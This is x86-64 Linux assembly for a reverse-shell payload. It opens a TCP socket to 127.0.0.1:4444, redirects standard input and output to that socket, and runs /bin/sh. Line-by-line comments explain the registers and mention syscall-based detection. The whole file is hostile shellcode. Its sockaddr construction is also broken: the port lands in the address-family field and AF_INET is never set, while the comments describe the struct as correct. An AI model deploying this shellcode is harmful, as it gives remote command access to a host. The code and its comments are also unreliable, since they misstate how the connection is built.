section .data
; Static copies of the endpoint. Note that the code in .text never
; references either label: it rebuilds the same address and port in
; registers instead, so these two definitions are currently dead data.
ip_address db 127,0,0,1 ; IP address 127.0.0.1 (loopback), four raw bytes
port dw 0x5c11 ; Port 4444 = 0x115c; stored as bytes 11 5c, i.e. network byte order
section .text
global _start
;-----------------------------------------------------------------------
; _start — raw Linux x86-64 entry point (no libc, direct syscalls; NASM
; Intel syntax).
; Opens a TCP socket, connects it to 127.0.0.1:4444, points fds 0/1/2
; at the socket and then execve()s /bin/sh. The syscall chain
; socket -> connect -> dup2 x3 -> execve in a single process is the
; classic reverse-shell pattern; from a defender's view that ordering is
; what a syscall-audit / seccomp / EDR rule keys on, together with the
; "/bin/sh" path literal and the hard-coded endpoint below.
; Register roles:
;   rdi = socket descriptor from the socket() call onward; it survives
;         every later syscall because syscall only clobbers rcx and r11.
;   rdx = 0 from the xor in the socket() setup; reused as sin_zero,
;         then set to 16 for connect(), then re-zeroed as execve()'s envp
;         and as the NUL / NULL terminators.
;   rsp = scratch area for the sockaddr_in and for "//bin/sh" plus argv.
; Error handling: only socket()'s result is consumed (moved into rdi);
; connect(), dup2() and execve() results are never checked, so a failure
; simply falls through to the next step.
; Never returns on success: execve replaces the process image.
;-----------------------------------------------------------------------
_start:
; socket(AF_INET, SOCK_STREAM, 0)
mov rax, 41 ; syscall: socket
mov rdi, 2 ; AF_INET
mov rsi, 1 ; SOCK_STREAM
xor rdx, rdx ; Protocol 0 — rdx stays 0 across the syscall and is reused below
syscall
mov rdi, rax ; rdi = socket descriptor (or -errno on failure; not checked)
; Prepare sockaddr_in structure
; struct sockaddr_in {
; short sin_family; // AF_INET
; unsigned short sin_port; // Port number
; struct in_addr sin_addr; // IP address
; char sin_zero[8];
; };
push rdx ; sin_zero[8]: rdx is still 0 from the xor above
mov rbx, 0x0100007f ; 127.0.0.1 as a little-endian dword (bytes 7f 00 00 01)
shl rbx, 16 ; shift the address up to leave the low 16 bits free
mov bx, 0x5c11 ; low word = 0x5c11 (bytes 11 5c = 4444 in network byte order)
push rbx ; first 8 bytes of the struct; the 16-byte struct now starts at rsp
mov rsi, rsp ; Pointer to sockaddr_in
; connect(socket, sockaddr_in, 16)
mov rax, 42 ; syscall: connect
mov rdx, 16 ; Size of sockaddr_in
syscall ; return value in rax is not checked
; Duplicate socket descriptor to stdin, stdout, stderr
mov rsi, 0 ; rsi = target fd, counts 0, 1, 2
.dup_loop:
mov rax, 33 ; syscall: dup2 — reloaded every iteration since rax holds the previous return value
mov rdi, rdi ; no-op: rdi already holds the socket descriptor and syscall does not clobber it
syscall ; dup2(sockfd, rsi)
inc rsi
cmp rsi, 3
jl .dup_loop ; loop while rsi < 3 (fds 0..2)
; execve("/bin/sh", NULL, NULL)
xor rdx, rdx ; rdx = 0: serves as envp (NULL) and as the terminators pushed below
push rdx ; 8 zero bytes: NUL terminator for the path string
mov rbx, 0x68732f6e69622f2f ; "//bin/sh" as a little-endian qword; the extra leading '/' pads the path to 8 bytes and names the same file
push rbx ; path string now at [rsp], NUL-terminated by the zero qword above
mov rdi, rsp ; Pointer to "//bin/sh" (argv[0] and the program path)
push rdx ; argv[1] = NULL
push rdi ; argv[0] = pointer to the path
mov rsi, rsp ; argv
mov rax, 59 ; syscall: execve
syscall ; execve(rdi, rsi, rdx = NULL envp); does not return on success
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